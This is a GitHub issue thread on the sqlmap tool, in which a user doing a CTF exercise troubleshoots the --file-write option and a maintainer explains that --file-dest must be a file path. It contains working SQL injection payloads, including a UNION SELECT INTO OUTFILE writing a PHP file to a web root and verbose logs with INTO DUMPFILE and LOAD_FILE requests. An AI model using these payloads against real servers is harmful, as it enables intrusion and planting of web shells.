### ISSUE TITLE
SQLmap --file-write issue

### ISSUE THREAD

**Issue by blackphoenician** [sqlmapproject/sqlmap#2621]
Hello,
Wanted to report experienced issues with --file-write while doing a CTF exercice.
I have the latest version .
With this command, sqlmap says that the file has not been written successfully in /var/www/css  :
  
`sqlmap -u "http://xxx.yyy/edit.php?id=1" --cookie="PHPSESSID=abcxyz" --file-write="test.php" --file-dest="/var/www/css"
`

While when I try it manually like this, it writes correctly test.php in /var/www/css :
http://xxx.yyy/edit.php?id=1 union select 1,2,3,"test123" into outfile "/var/www/css/test.php" --

I've tried --file-dest="/var/www/css/" and --file-dest="/var/www/css/test.php" for troobleshooting, result is the same.

For info, user is dba and this is the log:

> [*] starting at 16:02:23
> 
> [16:02:23] [INFO] resuming back-end DBMS 'mysql' 
> [16:02:23] [INFO] testing connection to the target URL
> [16:02:23] [INFO] heuristics detected web page charset 'ascii'
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: id (GET)
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=1 AND 4727=4727
> 
>     Type: AND/OR time-based blind
>     Title: MySQL >= 5.0.12 AND time-based blind
>     Payload: id=1 AND SLEEP(5)
> 
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 4 columns
>     Payload: id=-4130 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7071,0x434c6c66706f585545786a47777548656e47674f67676e434e41556e7a6d4e636a66556d77656942,0x717a787171),NULL-- MeJY
> ---
> [16:02:23] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Debian 6.0 (squeeze)
> web application technology: PHP 5.3.3, Apache 2.2.16
> back-end DBMS: MySQL >= 5.0.12
> [16:02:23] [INFO] fingerprinting the back-end DBMS operating system
> [16:02:23] [INFO] the back-end DBMS operating system is Linux
> [16:02:23] [WARNING] reflective value(s) found and filtering out
> [16:02:23] [WARNING] expect junk characters inside the file as a leftover from UNION query
> do you want confirmation that the local file 'test.php' has been successfully written on the back-end DBMS file system ('/var/www/css')? [Y/n] 
> [16:02:57] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
> [16:02:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/xxx.yyy'
> 
> [*] shutting down at 16:02:57
> 

Blackphoenician,

**Comment by stamparm** [comment]
...or better yet, `-v 5`?

**Comment by blackphoenician** [comment]
There you go:

`sqlmap -u "http://192.168.76.137/admin/edit.php?id=1" --cookie="PHPSESSID=81dl79tbi7jji3t71rgrlcu9o6" --file-write="test2.php" --file-dest="/var/www/css" -v 5`

[*] starting at 19:20:06

[19:20:06] [DEBUG] cleaning up configuration parameters
[19:20:06] [DEBUG] setting the HTTP timeout
[19:20:06] [DEBUG] setting the HTTP Cookie header
[19:20:06] [DEBUG] creating HTTP requests opener object
[19:20:06] [DEBUG] setting the write file functionality
[19:20:06] [INFO] resuming back-end DBMS 'mysql' 
[19:20:06] [DEBUG] resolving hostname '192.168.76.137'
[19:20:06] [INFO] testing connection to the target URL
[19:20:06] [TRAFFIC OUT] HTTP request [#1]:
GET /admin/edit.php?id=1 HTTP/1.1
Host: 192.168.76.137
Cookie: PHPSESSID=81dl79tbi7jji3t71rgrlcu9o6
Accept-encoding: gzip,deflate
Cache-control: no-cache
Accept: */*
User-agent: sqlmap/1.1.7.19#dev (http://sqlmap.org)
Connection: close

[19:20:06] [INFO] heuristics detected web page charset 'ascii'
[19:20:06] [TRAFFIC IN] HTTP response [#1] (200 OK):
Content-length: 484
X-powered-by: PHP/5.3.3-7+squeeze18
Content-encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Uri: http://192.168.76.137:80/admin/edit.php?id=1
Server: Apache/2.2.16 (Debian)
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Fri, 21 Jul 2017 09:31:54 GMT
Content-type: text/html
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4727=4727
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-4130 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7071,0x434c6c66706f585545786a47777548656e47674f67676e434e41556e7a6d4e636a66556d77656942,0x717a787171),NULL-- MeJY
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[19:20:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
[19:20:06] [INFO] fingerprinting the back-end DBMS operating system
[19:20:06] [DEBUG] performed 0 queries in 0.00 seconds
[19:20:06] [INFO] the back-end DBMS operating system is Linux
[19:20:06] [DEBUG] going to upload the file 'text' with UNION query SQL injection technique
[19:20:06] [DEBUG] encoding file to its hexadecimal string value
[19:20:06] [DEBUG] exporting the text file content to file '/var/www/css'
[19:20:06] [PAYLOAD] -1250 UNION ALL SELECT 0x74657374320a,NULL,NULL,NULL INTO DUMPFILE '/var/www/css'-- SelO
[19:20:06] [TRAFFIC OUT] HTTP request [#2]:
GET /admin/edit.php?id=-1250%20UNION%20ALL%20SELECT%200x74657374320a%2CNULL%2CNULL%2CNULL%20INTO%20DUMPFILE%20%27%2Fvar%2Fwww%2Fcss%27--%20SelO HTTP/1.1
Host: 192.168.76.137
Cookie: PHPSESSID=81dl79tbi7jji3t71rgrlcu9o6
Accept-encoding: gzip,deflate
Cache-control: no-cache
Accept: */*
User-agent: sqlmap/1.1.7.19#dev (http://sqlmap.org)
Connection: close

[19:20:06] [TRAFFIC IN] HTTP response [#2] (200 OK):
Content-length: 661
X-powered-by: PHP/5.3.3-7+squeeze18
Content-encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Uri: http://192.168.76.137:80/admin/edit.php?id=-1250%20UNION%20ALL%20SELECT%200x74657374320a%2CNULL%2CNULL%2CNULL%20INTO%20DUMPFILE%20%27%2Fvar%2Fwww%2Fcss%27--%20SelO
Server: Apache/2.2.16 (Debian)
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Fri, 21 Jul 2017 09:31:54 GMT
Content-type: text/html
[19:20:06] [WARNING] reflective value(s) found and filtering out
[19:20:06] [DEBUG] performed 1 queries in 0.05 seconds
[19:20:06] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file 'test2.php' has been successfully written on the back-end DBMS file system ('/var/www/css')? [Y/n] 
[19:20:08] [DEBUG] checking the length of the remote file '/var/www/css'
[19:20:08] [PAYLOAD] -9317 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7071,IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f637373)) AS CHAR),0x20),0x717a787171),NULL-- wWCO
[19:20:09] [TRAFFIC OUT] HTTP request [#3]:
GET /admin/edit.php?id=-9317%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x71627a7071%2CIFNULL%28CAST%28LENGTH%28LOAD_FILE%280x2f7661722f7777772f637373%29%29%20AS%20CHAR%29%2C0x20%29%2C0x717a787171%29%2CNULL--%20wWCO HTTP/1.1
Host: 192.168.76.137
Cookie: PHPSESSID=81dl79tbi7jji3t71rgrlcu9o6
Accept-encoding: gzip,deflate
Cache-control: no-cache
Accept: */*
User-agent: sqlmap/1.1.7.19#dev (http://sqlmap.org)
Connection: close

[19:20:09] [TRAFFIC IN] HTTP response [#3] (200 OK):
Content-length: 573
X-powered-by: PHP/5.3.3-7+squeeze18
Content-encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Uri: http://192.168.76.137:80/admin/edit.php?id=-9317%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x71627a7071%2CIFNULL%28CAST%28LENGTH%28LOAD_FILE%280x2f7661722f7777772f637373%29%29%20AS%20CHAR%29%2C0x20%29%2C0x717a787171%29%2CNULL--%20wWCO
Server: Apache/2.2.16 (Debian)
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Fri, 21 Jul 2017 09:31:56 GMT
Content-type: text/html
[19:20:09] [DEBUG] performed 1 queries in 0.02 seconds
[19:20:09] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[19:20:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.76.137'

[*] shutting down at 19:20:09

**Comment by stamparm** [comment]
`--file-dest="/var/www/css"` should be a filename path, not directory path. Something like `--file-dest="/var/www/css/test2.php"`.

```
--file-dest=DFILE   Back-end DBMS absolute filepath to write to
```
